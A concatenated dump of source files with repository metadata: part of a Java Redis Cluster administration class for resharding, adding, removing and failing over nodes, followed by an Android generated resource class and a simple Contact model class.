getNodeByNodeId(fromNodeId); if (fromNode == null || fromNode.hasFlag("slave")) { throw new InvalidParameterException(String.format("The specified node(%s) is not known or is not a master, please retry.", fromNodeId)); } if (fromNode.getInfo().getServedSlotsSet().size() == 0) { throw new InvalidParameterException(String.format("The specified node(%s) does not have slots, please retry.", fromNodeId)); } sources.add(fromNode); } } if (sources.stream().filter(source -> { return StringUtils.equals(source.getInfo().getNodeId(), target.getInfo().getNodeId()); }).findAny().isPresent()) { throw new ApiException(Constants.ERR_CODE_INVALID_PARAMETER, "Target node is also listed among the source nodes!", HttpStatus.BAD_REQUEST); } log.info("Ready to move {} slots.", slotCount); log.info("Source nodes : {}", sources.stream().map(v -> String.format("%s (%s)", v.getInfo().getHostAndPort(), v.getInfo().getNodeId())).collect(Collectors.toList())); log.info("Destination nodes : {}", String.format("%s (%s)", target.getInfo().getHostAndPort(), target.getInfo().getNodeId())); List<ReshardTable> reshardTables = computeReshardTable(sources, slotCount); reshardTables.forEach(reshardTable -> { moveSlot(reshardTable.getSource(), target, reshardTable.getSlot(), false, false); }); // Give one 3 second for gossip Thread.sleep(3000); } public void reshardClusterBySlots(String hostAndPort, Set<Integer> slots, String toNodeId) throws Exception { ValidationUtils.notBlank(toNodeId, "toNodeId"); loadClusterInfoFromNode(hostAndPort); checkCluster(); if (errors.size() > 0) { throw new ApiException(Constants.ERR_CODE_CLUSTER_HAS_ERRORS, "Please fix your cluster problems before resharding.", HttpStatus.BAD_REQUEST); } TribClusterNode target = getNodeByNodeId(toNodeId); if (target == null || target.hasFlag("slave")) { throw new ApiException(Constants.ERR_CODE_INVALID_PARAMETER, "The specified node is not known or is not a master, please retry.", HttpStatus.BAD_REQUEST); } List<ReshardTable> reshardTables = Lists.newArrayList(); Set<Integer> notFoundSlot = Sets.newHashSet(); for (Integer slot : slots) { boolean found = false; if (target.getInfo().getServedSlotsSet().contains(slot)) { continue; } for (TribClusterNode node : nodes) { if (StringUtils.equals(node.getInfo().getNodeId(), target.getInfo().getNodeId())) { continue; } if (node.hasFlag("slave")) { continue; } if (node.getInfo().getServedSlotsSet().size() == 0) { continue; } if (node.getInfo().getServedSlotsSet().contains(slot)) { found = true; reshardTables.add(new ReshardTable(node, slot)); break; } } if (!found) { notFoundSlot.add(slot); } } if (!notFoundSlot.isEmpty()) { throw new InvalidParameterException(String.format("Cannot find the nodes which has slots(%s).", JedisUtils.slotsDisplay(notFoundSlot))); } reshardTables.forEach(reshardTable -> { moveSlot(reshardTable.getSource(), target, reshardTable.getSlot(), false, false); }); // Give one 3 second for gossip Thread.sleep(3000); } public void addNodeIntoCluster(final String hostAndPort, final String newHostAndPort) throws Exception { ValidationUtils.hostAndPort(newHostAndPort); log.info("Adding node {} to cluster {}", newHostAndPort, hostAndPort); loadClusterInfoFromNode(hostAndPort); checkCluster(); // Add the new node TribClusterNode newNode = new TribClusterNode(newHostAndPort); newNode.connect(true); newNode.assertCluster(); newNode.loadInfo(); newNode.assertEmpty(); addNodes(newNode); // Send CLUSTER MEET command to the new node TribClusterNode node = getNodeByHostAndPort(hostAndPort); log.info("Send CLUSTER MEET to node {} to make it join the cluster.", newHostAndPort); newNode.getJedis().clusterMeet(node.getInfo().getHost(), node.getInfo().getPort()); log.info("New node added correctly."); // Give one 3 second for gossip Thread.sleep(3000); } public void addNodeIntoClusterAsReplica(final String hostAndPort, final String newHostAndPort, final String materNodeId) throws Exception { ValidationUtils.hostAndPort(newHostAndPort); log.info("Adding node {} to cluster {}", newHostAndPort, hostAndPort); loadClusterInfoFromNode(hostAndPort); checkCluster(); // If --master-id was specified, try to resolve it now so that we // abort before starting with the node configuration. TribClusterNode master; if (StringUtils.equals(materNodeId, "RANDOM")) { master = getMasterWithLeastReplicas(); log.info("Automatically selected master {} ().", master.getInfo().getHostAndPort(), master.getInfo().getMasterNodeId()); } else { master = getNodeByNodeId(materNodeId); if (master == null) { throw new InvalidParameterException(String.format("No such master ID %s", materNodeId)); } } // Add the new node TribClusterNode newNode = new TribClusterNode(newHostAndPort); newNode.connect(true); newNode.assertCluster(); newNode.loadInfo(); newNode.assertEmpty(); addNodes(newNode); // Send CLUSTER MEET command to the new node TribClusterNode node = getNodeByHostAndPort(hostAndPort); log.info("Send CLUSTER MEET to node {} to make it join the cluster.", newHostAndPort); newNode.getJedis().clusterMeet(node.getInfo().getHost(), node.getInfo().getPort()); // Additional configuration is needed if the node is added as // a slave. waitClusterJoin(); log.info("Configure node as replica of {}.", master.getInfo().getNodeId()); newNode.getJedis().clusterReplicate(master.getInfo().getNodeId()); log.info("New node added correctly."); // Give one 3 second for gossip Thread.sleep(3000); } public void deleteNodeOfCluster(final String hostAndPort, String nodeId, String reset, boolean shutdown) throws Exception { ValidationUtils.notBlank(nodeId, "nodeId"); log.info("Removing node({}) from cluster({}).", nodeId, hostAndPort); // Load cluster information loadClusterInfoFromNode(hostAndPort); // Check if the node exists and is not empty TribClusterNode node = getNodeByNodeId(nodeId); if (node == null) { throw new InvalidParameterException(String.format("No such node ID %s", nodeId)); } if (node.getInfo().getServedSlotsSet().size() > 0) { throw new InvalidParameterException(String.format("Node(%s) is not empty! Reshard data away and try again.", node.getInfo().getHostAndPort())); } // Send CLUSTER FORGET to all the nodes but the node to remove log.info("Sending CLUSTER FORGET messages to the cluster..."); nodes.stream().filter(v -> { return !StringUtils.equalsIgnoreCase(v.getInfo().getNodeId(), nodeId); }).forEach(v -> { if (StringUtils.isNotBlank(v.getInfo().getMasterNodeId()) && StringUtils.equalsIgnoreCase(v.getInfo().getMasterNodeId(), nodeId)) { // Reconfigure the slave to replicate with some other node TribClusterNode master = getMasterWithLeastReplicasSpecifiedNodeIdExcluded(nodeId); log.info("new master={}, old master = {}", master.getInfo().getNodeId(), nodeId); log.info("{} as replica of {}", v.getInfo().getNodeId(), master.getInfo().getNodeId()); v.getJedis().clusterReplicate(master.getInfo().getNodeId()); } v.getJedis().clusterForget(nodeId); }); if (StringUtils.isNoneBlank(reset)) { if (StringUtils.equalsIgnoreCase(reset, "soft")) { log.info("SOFT RESET the node."); node.getJedis().clusterReset(Reset.SOFT); } else if (StringUtils.equalsIgnoreCase(reset, "hard")) { log.info("HARD RESET the node."); node.getJedis().clusterReset(Reset.HARD); } } if (shutdown) { log.info("SHUTDOWN the node."); node.getJedis().shutdown(); } // Give one 3 second for gossip Thread.sleep(3000); } public void deleteFailNodeOfCluster(final String hostAndPort, String nodeId) throws Exception { ValidationUtils.notBlank(nodeId, "nodeId"); log.info("Removing node({}) from cluster({}).", nodeId, hostAndPort); // Load cluster information loadClusterInfoFromNode(hostAndPort); // Send CLUSTER FORGET to all the nodes but the node to remove log.info("Sending CLUSTER FORGET messages to the cluster..."); nodes.stream().filter(v -> { return !StringUtils.equalsIgnoreCase(v.getInfo().getNodeId(), nodeId); }).forEach(v -> { if (StringUtils.isNotBlank(v.getInfo().getMasterNodeId()) && StringUtils.equalsIgnoreCase(v.getInfo().getMasterNodeId(), nodeId)) { // Reconfigure the slave to replicate with some other node TribClusterNode master = getMasterWithLeastReplicasSpecifiedNodeIdExcluded(nodeId); log.info("new master={}, old master = {}", master.getInfo().getNodeId(), nodeId); log.info("{} as replica of {}", v.getInfo().getNodeId(), master.getInfo().getNodeId()); v.getJedis().clusterReplicate(master.getInfo().getNodeId()); } v.getJedis().clusterForget(nodeId); }); // Give one 3 second for gossip Thread.sleep(3000); } public void replicateNode(final String hostAndPort, final String masterNodeId) throws Exception { ValidationUtils.notBlank(masterNodeId, "masterNodeId"); log.info("Replicate node({}) as slave of {}.", hostAndPort, masterNodeId); loadClusterInfoFromNode(hostAndPort); checkCluster(); TribClusterNode node = getNodeByHostAndPort(hostAndPort); if (node == null) { throw new InvalidParameterException(String.format("Node(%s) does not exists.", hostAndPort)); } if (node.hasFlag("slave")) { // OK } else { if (node.getInfo().getServedSlotsSet().size() > 0) { throw new InvalidParameterException(String.format("Node(%s) is not empty! Reshard data away and try again.", hostAndPort)); } } TribClusterNode master = getNodeByNodeId(masterNodeId); if (master == null) { throw new InvalidParameterException(String.format("Node(%s) does not exists.", masterNodeId)); } if (!master.hasFlag("master")) { throw new InvalidParameterException(String.format("Node(%s) is not master.", masterNodeId)); } log.info("Configure node({}) as replica of {}.", hostAndPort, masterNodeId); node.getJedis().clusterReplicate(masterNodeId); // Give one 3 second for gossip Thread.sleep(3000); } public void failoverNode(final String hostAndPort) throws Exception { log.info("Failover node({}).", hostAndPort); loadClusterInfoFromNode(hostAndPort); checkCluster(); TribClusterNode node = getNodeByHostAndPort(hostAndPort); if (node == null) { throw new InvalidParameterException(String.format("Node(%s) does not exists.", hostAndPort)); } if (node.hasFlag("slave")) { // OK } else { throw new InvalidParameterException(String.format("Node(%s) is not slave.", hostAndPort)); } node.getJedis().clusterFailover(); // Give one 3 second for gossip Thread.sleep(3000); } TribClusterNode getMasterWithLeastReplicas() { List<TribClusterNode> masters = nodes.stream().filter(node -> node.hasFlag("master")).collect(Collectors.toList()); masters.sort((o1, o2) -> Integer.compare(o1.getInfo().getServedSlotsSet().size(), o2.getInfo().getServedSlotsSet().size())); return masters.get(0); } TribClusterNode getMasterWithLeastReplicasSpecifiedNodeIdExcluded(String nodeId) { List<TribClusterNode> masters = nodes.stream().filter(node -> node.hasFlag("master")).filter(node -> !StringUtils.equalsIgnoreCase(node.getInfo().getNodeId(), nodeId)).collect(Collectors.toList()); masters.sort((o1, o2) -> Integer.compare(o1.getInfo().getServedSlotsSet().size(), o2.getInfo().getServedSlotsSet().size())); return masters.get(0); } // Given a list of source nodes return a "resharding plan" // with what slots to move in order to move "numslots" slots to another // instance. List<ReshardTable> computeReshardTable(List<TribClusterNode> sources, int slotCount) { List<ReshardTable> moved = Lists.newArrayList(); // Sort from bigger to smaller instance, for two reasons: // 1) If we take less slots than instances it is better to start // getting from the biggest instances. // 2) We take one slot more from the first instance in the case of not // perfect divisibility. Like we have 3 nodes and need to get 10 // slots, we take 4 from the first, and 3 from the rest. So the // biggest is always the first. sources.sort((o1, o2) -> { return Integer.compare(o2.getInfo().getServedSlotsSet().size(), o1.getInfo().getServedSlotsSet().size()); }); int sourceTotalSlot = sources.stream().mapToInt(source -> source.getInfo().getServedSlotsSet().size()).sum(); if (sourceTotalSlot < slotCount) { throw new InvalidParameterException(String.format("Total slot count which is sum of from nodes is not enough. Slot count is %s, But total slot count is %s.", slotCount, sourceTotalSlot)); } int i = 0; for (TribClusterNode source : sources) { // Every node will provide a number of slots proportional to the // slots it has assigned. double n = (double)slotCount / (double)sourceTotalSlot * (double)source.getInfo().getServedSlotsSet().size(); if (i == 0) { n = Math.ceil(n); } else { n = Math.floor(n); } int j = 0; for (Integer slot : source.getInfo().getServedSlotsSet()) { if (j >= n || moved.size() >= slotCount) { break; } moved.add(new ReshardTable(source, slot)); j++; } i++; } return moved; } void clusterError(String error) { log.warn(error); errors.add(error); } List<String> checkCluster() { // init error errors = Lists.newArrayList(); checkConfigConsistency(); checkOpenSlots(); // TODO: checkSlotCoverage return errors; } void checkConfigConsistency() { if (isConfigConsistent()) { log.info("OK. All nodes agree about slots configuration."); } else { clusterError("Nodes don't agree about configuration!"); } } boolean isConfigConsistent() { Set<String> signatures = Sets.newHashSet(); nodes.forEach(node -> { String signature = node.getConfigSignature(); signatures.add(signature); }); return signatures.size() == 1; } void checkOpenSlots() { log.info("Check for open slots."); Set<Integer> openSlots = Sets.newTreeSet(); for (TribClusterNode node : nodes) { if (node.getInfo().getMigrating().size() > 0) { clusterError(String.format("[Warning] Node %s has slots in migrating state. (%s).", node.getInfo().getHostAndPort(), StringUtils.join(node.getInfo().getMigrating().keySet(), ","))); openSlots.addAll(node.getInfo().getMigrating().keySet()); } else if (node.getInfo().getImporting().size() > 0) { clusterError(String.format("[Warning] Node %s has slots in importing state (%s).", node.getInfo().getHostAndPort(), StringUtils.join(node.getInfo().getImporting().keySet(), ","))); openSlots.addAll(node.getInfo().getImporting().keySet()); } } if (openSlots.size() > 0) { log.warn("The following slots are open: {}", StringUtils.join(openSlots, ",")); } if (fix) { openSlots.forEach(v -> { fixOpenSlot(Integer.valueOf(v)); }); } } /** * Slot 'slot' was found to be in importing or migrating state in one or<br> * more nodes. This function fixes this condition by migrating keys where<br> * it seems more sensible. * @param slot */ void fixOpenSlot(int slot) { log.info("Fixing open slots. {}", slot); TribClusterNode owner = getSlotOwner(slot); if (owner == null) { throw new ApiException(Constants.ERR_CODE_UNKNOWN, "Fix me, some work to do here.", HttpStatus.INTERNAL_SERVER_ERROR); } List<TribClusterNode> migrating = Lists.newArrayList(); List<TribClusterNode> importing = Lists.newArrayList(); for (TribClusterNode node : nodes) { if (node.hasFlag("slave")) { continue; } if (node.getInfo().getMigrating().containsKey(Integer.valueOf(slot))) { migrating.add(node); } else if (node.getInfo().getImporting().containsKey(Integer.valueOf(slot))) { importing.add(node); } else if (node.getJedis().clusterCountKeysInSlot(slot) > 0 && !StringUtils.equalsIgnoreCase(node.getInfo().getNodeId(), owner.getInfo().getNodeId())) { log.info("Found keys about slot {} in node {}", slot, node.getInfo().getHostAndPort()); importing.add(node); } } log.info("Set as migrating in: {}", migrating.stream().map(v -> v.getInfo().getHostAndPort())); log.info("Set as migrating in: {}", importing.stream().map(v -> v.getInfo().getHostAndPort())); // Case 1: The slot is in migrating state in one slot, and in // importing state in 1 slot. That's trivial to address. if (migrating.size() == 1 && importing.size() == 1) { moveSlot(migrating.get(0), importing.get(0), slot, true, false); } else if (migrating.size() == 0 && importing.size() > 0) { log.info("Moving all the {} slot keys to its owner {}", slot, owner.getInfo().getHostAndPort()); for (TribClusterNode importingNode : importing) { if (StringUtils.equalsIgnoreCase(importingNode.getInfo().getNodeId(), owner.getInfo().getNodeId())) { continue; } moveSlot(importingNode, owner, slot, true, true); log.info("Setting {} as STABLE in {}", slot, importingNode.getInfo().getNodeId()); importingNode.getJedis().clusterSetSlotStable(slot); } } else { throw new ApiException(Constants.ERR_CODE_UNKNOWN, "Sorry, we can't fix this slot yet (work in progress)", HttpStatus.INTERNAL_SERVER_ERROR); } } /** * Move slots between source and target nodes using MIGRATE.<br> * Options:<br> * :fix -- We are moving in the context of a fix. Use REPLACE.<br> * :cold -- Move keys without opening / reconfiguring the nodes.<br> * @param source * @param target * @param slot * @param fix * @param cold */ void moveSlot(TribClusterNode source, TribClusterNode target, int slot, boolean fix, boolean cold) { // We start marking the slot as importing in the destination node, // and the slot as migrating in the target host. Note that the order of // the operations is important, as otherwise a client may be redirected // to the target node that does not yet know it is importing this slot. log.info("Moving slot {} from {} to {}.", slot, source.getInfo().getHostAndPort(), target.getInfo().getHostAndPort()); if (!cold) { target.getJedis().clusterSetSlotImporting(slot, source.getInfo().getNodeId()); source.getJedis().clusterSetSlotMigrating(slot, target.getInfo().getNodeId()); } while (true) { List<String> keys = source.getJedis().clusterGetKeysInSlot(slot, 10); if (keys.size() == 0) { break; } keys.forEach(key -> { try { source.getJedis().migrate(target.getInfo().getHost(), target.getInfo().getPort(), key, 0, 15000); } catch (Exception e) { if (fix && StringUtils.contains(e.getMessage(), "BUSYKEY")) { // TODO: i want to replcate. but jedis not have replace. log.error("Error.", e); throw new ApiException(Constants.ERR_CODE_UNKNOWN, e.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR); } else { log.error("Error.", e); throw new ApiException(Constants.ERR_CODE_UNKNOWN, e.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR); } } }); } if (!cold) { nodes.forEach(node -> { node.getJedis().clusterSetSlotNode(slot, target.getInfo().getNodeId()); }); } } TribClusterNode getSlotOwner(int slot) { return nodes.stream().filter(node -> { return node.getInfo().getServedSlotsSet().contains(slot); }).findFirst().orElse(null); } // TODO: // void checkSlotsCoverage() { // log.info("Check slots coverage."); // Set<Integer> slots = coveredSlots(); // if (slots.size() == Constants.ALL_SLOTS_SIZE) { // log.info("All 16384 slots covered."); // } else { // log.warn("Not all 16384 slots covered."); // if (fix) { // fixSlotsCoverage(); // } // } // } // // Set<Integer> coveredSlots() { // Set<Integer> slots = Sets.newTreeSet(); // nodes.forEach(node -> { // slots.addAll(node.getInfo().getServedSlotsSet()); // }); // return slots; // } // // void fixSlotsCoverage() { // Set<Integer> notCovered = Sets.newTreeSet(); // for (int i = 0; i < Constants.ALL_SLOTS_SIZE; i++) { // notCovered.add(i); // } // notCovered.removeAll(coveredSlots()); // log.info("Fixing slots coverage."); // log.info("List of not covered slots: {}", StringUtils.join(notCovered, ",")); // // // For every slot, take action depending on the actual condition: // // 1) No node has keys for this slot. // // 2) A single node has keys for this slot. // // 3) Multiple nodes have keys for this slot. // Set<Integer> slots = Sets.newTreeSet(); // // } void flushNodesConfig() { nodes.forEach(node -> { node.flushNodeConfig(); }); } @SuppressWarnings("unused") void assignConfigEpoch() { int configEpoch = 1; for (TribClusterNode node : nodes) { try { //TODO: SET CONFIG EPOCH } catch (Exception e) { } configEpoch++; } } void joinCluster() { TribClusterNode firstNode = null; for (TribClusterNode node : nodes) { if (firstNode == null) { firstNode = node; } else { node.getJedis().clusterMeet(firstNode.getInfo().getHost(), firstNode.getInfo().getPort()); } } } void waitClusterJoin() throws Exception { log.info("Waiting for the cluster join."); String waiting = "."; while (!isConfigConsistent()) { log.info(waiting); waiting += "."; Thread.sleep(1000); } } void checkCreateParameters() { int masters = nodes.size() / (replicas + 1); if (masters < 3) { throw new InvalidParameterException("Redis Cluster requires at least 3 master nodes."); } } void addNodes(TribClusterNode node) { nodes.add(node); } void allocSlots() { int mastersCount = nodes.size() / (replicas + 1); List<TribClusterNode> masters = Lists.newArrayList(); // The first step is to split instances by IP. This is useful as // we'll try to allocate master nodes in different physical machines // (as much as possible) and to allocate slaves of a given master in // different physical machines as well. // // This code assumes just that if the IP is different, than it is more // likely that the instance is running in a different physical host // or at least a different virtual machine. Map<String, List<TribClusterNode>> tmpIps = nodes.stream().collect(Collectors.groupingBy(v -> v.getInfo().getHost(), Collectors.toList())); Map<String, List<TribClusterNode>> ips = Maps.newTreeMap(); ips.putAll(tmpIps); for (Map.Entry<String, List<TribClusterNode>> e : ips.entrySet()) { List<TribClusterNode> hostNodes = e.getValue(); hostNodes.sort((o1, o2) -> { if (StringUtils.equals(o1.getInfo().getHost(), o2.getInfo().getHost())) { return Integer.compare(o1.getInfo().getPort(), o2.getInfo().getPort()); } else { return o1.getInfo().getHost().compareTo(o2.getInfo().getHost()); } }); } // Select master instances List<TribClusterNode> interleaved = Lists.newArrayList(); boolean stop = false; while (!stop) { for (Map.Entry<String, List<TribClusterNode>> e : ips.entrySet()) { List<TribClusterNode> hostNodes = e.getValue(); if (hostNodes.isEmpty()) { if (interleaved.size() == nodes.size()) { stop = true; continue; } } else { interleaved.add(hostNodes.remove(0)); } } } masters = Lists.newArrayList(interleaved.subList(0, mastersCount)); interleaved = Lists.newArrayList(interleaved.subList(mastersCount, interleaved.size())); log.info("masters={}", masters); log.info("interleaved={}", interleaved); // Alloc slots on masters double slotsPerNode = Constants.ALL_SLOTS_SIZE / mastersCount; int first = 0; int last; double cursor = 0.0; for (int i = 0; i < masters.size(); i++) { last = (int)Math.round(cursor + slotsPerNode - 1.0); if (last > Constants.ALL_SLOTS_SIZE || i == masters.size() - 1) { last = Constants.ALL_SLOTS_SIZE - 1; } if (last < first) { // Min step is 1 last = first; } Set<Integer> slots = Sets.newTreeSet(); for (int j = first; j <= last; j++) { slots.add(j); } log.info("add slots to {}. first={}, last={}", masters.get(i), first, last); masters.get(i).addTmpSlots(slots); first = last + 1; cursor = cursor + slotsPerNode; } // Select N replicas for every master. // We try to split the replicas among all the IPs with spare nodes // trying to avoid the host where the master is running, if possible. // // Note we loop two times. The first loop assigns the requested // number of replicas to each master. The second loop assigns any // remaining instances as extra replicas to masters. Some masters // may end up with more than their requested number of replicas, but // all nodes will be used. log.info("Select requested replica."); Map<TribClusterNode, List<TribClusterNode>> replicasOfMaster = Maps.newLinkedHashMap(); for (TribClusterNode master : masters) { replicasOfMaster.put(master, Lists.newArrayList()); while (replicasOfMaster.get(master).size() < this.replicas) { if (interleaved.size() == 0) { log.info("break because node count is 0"); break; } // Return the first node not matching our current master TribClusterNode replicaNode; Optional<TribClusterNode> replicaNodeOp; replicaNodeOp = interleaved.stream().filter(v -> { boolean notSameHostAsMaster = !StringUtils.equals(master.getInfo().getHost(), v.getInfo().getHost()); boolean sameHostAsAlreadyRegisterdReplica = replicasOfMaster.get(master).stream().anyMatch(rpl -> { return StringUtils.equals(v.getInfo().getHost(), rpl.getInfo().getHost()); }); return notSameHostAsMaster && !sameHostAsAlreadyRegisterdReplica; }).findFirst(); if (replicaNodeOp.isPresent()) { replicaNode = replicaNodeOp.get(); interleaved.remove(replicaNode); } else { // replicaNodeOp = interleaved.stream().filter(v -> { // boolean notSameHostAsMaster = !StringUtils.equals(master.getInfo().getHost(), v.getInfo().getHost()); // return notSameHostAsMaster; // }).findFirst(); // if (replicaNodeOp.isPresent()) { // replicaNode = replicaNodeOp.get(); // interleaved.remove(replicaNode); // } else { replicaNode = interleaved.remove(0); // } } log.info("Select {} as replica of {}", replicaNode, master); replicaNode.setAsReplica(master.getInfo().getNodeId()); replicasOfMaster.get(master).add(replicaNode); } } // want to attach different host of master and min size. log.info("Select extra replica."); for (TribClusterNode extra : interleaved) { TribClusterNode master; Optional<Entry<TribClusterNode, List<TribClusterNode>>> entrySetNodeOp; int sameHostOfMasterCount = (int)masters.stream().filter(v -> { return StringUtils.equals(v.getInfo().getHost(), extra.getInfo().getHost()); }).count(); entrySetNodeOp = replicasOfMaster.entrySet().stream().min((e1, e2) -> { return Integer.compare(e1.getValue().size(), e2.getValue().size()); }); int minSize = entrySetNodeOp.get().getValue().size(); int sameMinCount = (int)replicasOfMaster.entrySet().stream().filter(v -> { return minSize == v.getValue().size(); }).count(); if (sameMinCount > sameHostOfMasterCount) { entrySetNodeOp = replicasOfMaster.entrySet().stream().filter(e -> { return !StringUtils.equals(e.getKey().getInfo().getHost(), extra.getInfo().getHost()); }).min((e1, e2) -> { return Integer.compare(e1.getValue().size(), e2.getValue().size()); }); } master = entrySetNodeOp.get().getKey(); log.info("Select {} as replica of {} (extra)", extra, master); extra.setAsReplica(master.getInfo().getNodeId()); replicasOfMaster.get(master).add(extra); } } List<CreateClusterParam> buildCreateClusterParam() { // first loop master List<CreateClusterParam> params = Lists.newArrayList(); nodes.stream().filter(node -> { return StringUtils.isBlank(node.getInfo().getMasterNodeId()); }).forEach(node -> { int startSlotNumber = node.getTmpServedSlots().stream().min(Integer::compare).get(); int endSlotNumber = node.getTmpServedSlots().stream().max(Integer::compare).get(); CreateClusterParam param = new CreateClusterParam(); param.setStartSlotNumber(String.valueOf(startSlotNumber)); param.setEndSlotNumber(String.valueOf(endSlotNumber)); param.setMaster(node.getInfo().getHostAndPort()); param.setMasterNodeId(node.getInfo().getNodeId()); params.add(param); }); // replica loop nodes.stream().filter(node -> { return StringUtils.isNotBlank(node.getInfo().getMasterNodeId()); }).forEach(node -> { String masterNodeId = node.getInfo().getMasterNodeId(); params.stream().filter(param -> { return StringUtils.equals(param.getMasterNodeId(), masterNodeId); }).forEach(param -> { List<String> replicaList = param.getReplicas(); if (param.getReplicas() == null) { replicaList = Lists.newArrayList(); param.setReplicas(replicaList); } replicaList.add(node.getInfo().getHostAndPort()); }); }); // sort params.sort((v1, v2) -> { return Integer.compare(Integer.valueOf(v1.getStartSlotNumber()), Integer.valueOf(v2.getStartSlotNumber())); }); return params; } void loadClusterInfoFromNode(String hostAndPort) { ValidationUtils.hostAndPort(hostAndPort); TribClusterNode node = new TribClusterNode(hostAndPort); node.connect(true); node.assertCluster(); node.loadInfo(true); addNodes(node); for (ClusterNode friend : node.getFriends()) { if (friend.hasFlag("noaddr") || friend.hasFlag("disconnected") || friend.hasFlag("fail")) { continue; } TribClusterNode friendTribNode = new TribClusterNode(friend.getHostAndPort()); friendTribNode.connect(); if (friendTribNode.getJedis() == null) { continue; } try { friendTribNode.loadInfo(); addNodes(friendTribNode); } catch (Exception e) { log.error("Unable to load info for node {}.", friend.getHostAndPort()); } } populateNodesReplicasInfo(); } void populateNodesReplicasInfo() { // Populate the replicas field using the replicate field of slave // nodes. nodes.forEach(node -> { if (StringUtils.isNotBlank(node.getInfo().getMasterNodeId())) { TribClusterNode master = getNodeByNodeId(node.getInfo().getMasterNodeId()); if (master == null) { throw new ApiException(Constants.ERR_CODE_UNKNOWN, String.format("%s claims to be slave of unknown node ID %s.", node.getInfo().getHostAndPort(), node.getInfo().getMasterNodeId()), HttpStatus.INTERNAL_SERVER_ERROR); } master.getReplicas().add(node); } }); } TribClusterNode getNodeByNodeId(String nodeId) { return nodes.stream().filter(node -> { return StringUtils.equalsIgnoreCase(node.getInfo().getNodeId(), nodeId); }).findFirst().orElse(null); } TribClusterNode getNodeByHostAndPort(String hostAndPort) { return nodes.stream().filter(node -> { return StringUtils.equalsIgnoreCase(node.getInfo().getHostAndPort(), hostAndPort); }).findFirst().orElse(null); } @Override public void close() throws IOException { if (nodes != null) { nodes.forEach(v -> { try { v.close(); } catch (Exception e) { log.error("Failed to close redis connection."); } }); } } @Getter @Setter public static class ReshardTable { private TribClusterNode source; private int slot; public ReshardTable(TribClusterNode source, int slot) { this.source = source; this.slot = slot; } } }
[ "ryosuke.hasebe@linecorp.com" ]
ryosuke.hasebe@linecorp.com
8cc32f7f2fbdd5c6a29de486bf9e1e4a5ef7441f
cc4325553d49d968cafbdac0a6adda4a7a74ea55
/android/MapView/gen/com/nitobi/R.java
3142a15c58e1852a722ead629fa05d29695c39bd
[]
no_license
tollybobs/Where20Mobile
62f0d4285f9242f99c4a63a7119800fbbcc58232
9f3e3adee402e283938e492d6416fc2708b1baa4
refs/heads/master
2021-01-15T17:28:36.162279
2009-05-19T23:09:29
2009-05-19T23:09:29
null
0
0
null
null
null
null
UTF-8
Java
false
false
860
java
/* AUTO-GENERATED FILE. DO NOT MODIFY. * * This class was automatically generated by the * aapt tool from the resource data it found. It * should not be modified by hand. */ package com.nitobi; public final class R { public static final class attr { } public static final class drawable { public static final int androidmarker=0x7f020000; public static final int beer=0x7f020001; public static final int icon=0x7f020002; } public static final class id { public static final int button=0x7f050000; public static final int mapview=0x7f050001; } public static final class layout { public static final int main=0x7f030000; } public static final class string { public static final int app_name=0x7f040001; public static final int hello=0x7f040000; } }
[ "davejohnson@dave-johnsons-macbook-pro.local" ]
davejohnson@dave-johnsons-macbook-pro.local
1369590e0e292bda6f9611ace74506175673f33a
0cc9a87925f472787290b63aebee1e31bbd9d4e2
/app/src/main/java/com/example/contacts/Contact.java
bce55fd0d6da7b9bb88815164877b8fe6c522258
[]
no_license
arroncushing/CPSC312Project
8cb895d0992293800076ce6810c528b46f0e1cdf
6e3dbec8ded5508a1fa5b25c15e8d2da0a4eec88
refs/heads/master
2020-09-17T10:11:57.702272
2019-12-11T11:31:55
2019-12-11T11:31:55
224,073,219
0
0
null
null
null
null
UTF-8
Java
false
false
2,630
java
package com.example.contacts; import androidx.annotation.NonNull; /** * Sets up a Contact class which can be stored into a list */ public class Contact { private String name; private String phoneNumber; private String eMail; private String address; /** * DVC for the Contact class */ public Contact() { name = "BLANK_NAME"; phoneNumber = ""; eMail = ""; address = ""; } /** * EVC for the Contact class * * @param name - name of the contact * @param phoneNumber - phone number of the contact * @param eMail - email of the contact * @param address - address of the contact */ public Contact(String name, String phoneNumber, String eMail, String address) { this.name = name; this.phoneNumber = phoneNumber; this.eMail = eMail; this.address = address; } /** * @return String representation of the Contact (in this case, the Contact's name) */ @NonNull @Override public String toString() { return name; } /** * Gets the name of the Contact * * @return contact's name */ public String getName() { return name; } /** * Sets the name of the Contact * * @param name - name to set as contact's name */ public void setName(String name) { this.name = name; } /** * Gets the phone number of the Contact * * @return - contact's phone number */ public String getPhoneNumber() { return phoneNumber; } /** * Sets the phone number of the Contact * * @param phoneNumber - phone number to set as contact's phone number */ public void setPhoneNumber(String phoneNumber) { this.phoneNumber = phoneNumber; } /** * Gets the email address of the Contact * * @return - contact's email address */ public String geteMail() { return eMail; } /** * Sets the email address of the Contact * * @param eMail - email address to set as contact's email address */ public void seteMail(String eMail) { this.eMail = eMail; } /** * Gets the physical address of the Contact * * @return - contact's physical address */ public String getAddress() { return address; } /** * Sets the physical address of the Contact * * @param address - street address to set as contact's address */ public void setAddress(String address) { this.address = address; } }
[ "arroncushing@gmail.com" ]
arroncushing@gmail.com
8f9adece1043d27b434d32f0b9a9d369b62044ff
3de949a9dd87dc20bc0a36bcdb1b2c3f537419de
/ch02/src/main/java/twoStop/ThreadB.java
d0e4e37424ddb54051a697f4ac2ab0c7b7ec56fc
[]
no_license
dengqz/mythread
b7a019be40f65503d3bd27d9b763b08573f8f551
6221d7c7e8f1cad8306f393ccd56f7d3f7bf8934
refs/heads/master
2020-03-19T06:38:42.712887
2018-08-21T08:21:27
2018-08-21T08:21:27
136,042,171
0
0
null
null
null
null
UTF-8
Java
false
false
320
java
package twoStop; /** * @author : Cheese * @date : 2018/6/8 * @description : TODO */ public class ThreadB extends Thread { private Service service; public ThreadB(Service service){ super(); this.service=service; } @Override public void run() { service.methodB(); } }
[ "872114581@qq.com" ]
872114581@qq.com
e9a39d9432339b837f92f148a0c431ed43e8df7b
eb18a638fce93fd99805625dd7ca7c49ea48507d
/discovery-plugin-strategy-starter-service/src/main/java/com/nepxion/discovery/plugin/strategy/service/aop/FeignStrategyInterceptor.java
83235939cc8c0a608b3951c185048f2c4c48cf2b
[ "Apache-2.0" ]
permissive
cxxichen/Discovery
873cf2b35c5251eb2e916b58fcc02ed270d18e94
d67108db98a2f6a6492a4db2a23fc0938c65c0fe
refs/heads/master
2020-08-11T06:33:26.191245
2019-10-11T07:01:55
2019-10-11T07:01:55
214,510,511
1
0
